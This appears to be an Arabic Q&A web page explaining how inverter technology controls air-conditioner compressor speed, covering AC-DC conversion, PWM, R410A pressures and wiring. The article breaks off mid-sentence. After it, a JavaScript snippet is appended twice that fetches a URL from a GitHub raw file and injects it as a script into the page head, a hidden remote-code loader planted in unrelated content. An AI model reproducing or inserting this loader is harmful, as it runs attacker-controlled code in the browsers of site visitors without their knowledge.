ما هو الانفرتر inventer الذى يركب على الضاغط .؟

ما هو الانفرتر inventer الذى يركب على الضاغط .؟
الاجابة
للتحكم بسرعه الكباس يتم عن طريق تغيير الفولت من AC الى D.C وتغيير الذبذبه فيتغير سرعه الكباس فيتحكم بدرجه التبريد
اولا : تكنولوجيا الانفرتر ليست بجديده ولكنها متواجده منذ سنوات عديده وهذه التكنولوجيا تقوم بتوفير حوالى 30 % من طاقه التكييف الضائعه وهذه التكنولوجيا محتاجه الى مهندس او فنى يكون على قدر كاف من العلم لكى يستوعبها لانها تحتاج الى قدر كبير من فهم الاليكترونيات بصفه خاصه وساحاول ان اشرحها بطريقه مبسطه وعليك التكمل :
الهدف الاساسى من هذه التكنولوجيا هو التحكم فى سرعه الكباس ( compressor ) والكباس المسنخدم فى هذه النوعيه من اجهزه التكييف من الممكن ان يكون من النوع الذى يعمل على التيار المستمر dc volt ومن الممكن ان يكون من النوع 3 phase وللتحكم فى سرعه الكباس اى المحرك المستخدم فى الكباس فاننا
اولا نقوم بتعديل الفولت الداخل الى وحده التكثيف من فولت متردد الى فولت مستمر وتتم هذه العمله داخل بورده وحده التكثيف فى جزء يسمى converter اى محول التيار المتردد الى مستمر ثم بعد ذلك ندخل مرحله inverter اى تحويل التيار المستمر الى تيار متردد يتم التحكم فيه عن طريق الذبذبه ( frequency ) المعطاه له والتى تتحكم فى سرعه المحرك وتسمى هذه العمليه
( pulse width modulation )
معظم الاجهزه التى تعمل بالانفرتر يركب بها صمام تمدد يغلق ويفتح بخطوات وياخذ اشارته من البورده عن طريق اشاره قادمه وراجعه للفان كويل
( input – out put signal )
هذه الاجهزه معظمها يستخدم فريون 410 A وضغط السحب يتراوح ما بين 110 – 130 psi ويجب الرجوع لخريطه هذا الفريون لان ضغط السحب يعتمد على درجه حراره المبخر وضغط الطرد لهذا النوع من الاجهزه يتراوح مابين 425 الى 450 psi .
الاجهزه التى تعمل على 220 فولت ستجد الاسلاك الواصله مابين الوحده الداخليه والوحده الخارجيه هم 3 اسلاك اثنين لاسلاك ال power وسلك واحد يسمى ال ** signal
وهو المسئول عن ارسال الاشاره من الوحده الداخليه الى الوحده الخارجيه وعكسها من الوحده الخارجيه الى الوحده الداخليه .
معظم هذه الاجهزه ستجد ان مكثف وحده التكثيف كبير مقارنه بمكثف يعمل على فريون 22
•مكيف بتكنولوجيا Inverter يوفر الكهرباء لماذا؟
معظم الطاقة الكهربائية في المكيف يستهلكها الجزء الاساسي فيه وهو “الضاغط”.
في تكنولوجية التكييف العادي يكون للضاغط سرعة (قدرة) انتاج ثابته، أي انه يعمل ب 100% أو ب 0% (يتوقف عن العمل).
لذا حتى عندما يحتاج الضاغط للوصول الى قدرة انتاج لا تستوجب عمله بالسرعة القصوى سيعمل الضاغط بالسرعة القصوى وسيستهلك الحد الاقصى من الكهرباء.
أما ضاغط الInverter فيعمل بشكل آخر: أي انه يعمل بسرعات متغيرة تتراوح بين ال 0% وبين ال 100%… أضف الى ذلك وجود منظومة تحكم الكترونية لعمل الضاغط تقرر السرعة المطلوبة للوصول لدرجة حرارة معينة، وتمكن من توفير جدي في الكهرباء يصل الى 30%.
هو جهاز متكامل ومخصص للتحكم بالمحركات التى تعمل على التيار المتناوب مهما كانت قدرت المحرك حيث يوجد اجهزة انفرتر تبدأمن نصف حصان الى 120 حصان
وهذا الجهاز يسمى ب المبدلة الترددية وهو يغنى ايضا عن طرق بدأ الحركة المتعرف عليها وهى الاستار دلتا وعن طرق البدأ بالمقاومات او المحولات الاولية لان عن طريق هذا الجهاز استطعنا التحكم فى التردد والجهد
هذه الاجهزه التى تعمل بتكنولوجيا الانفرتر حقيقى تستحق الاحترام وان نرفع لها القبعه ولكن تكلفتها

;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});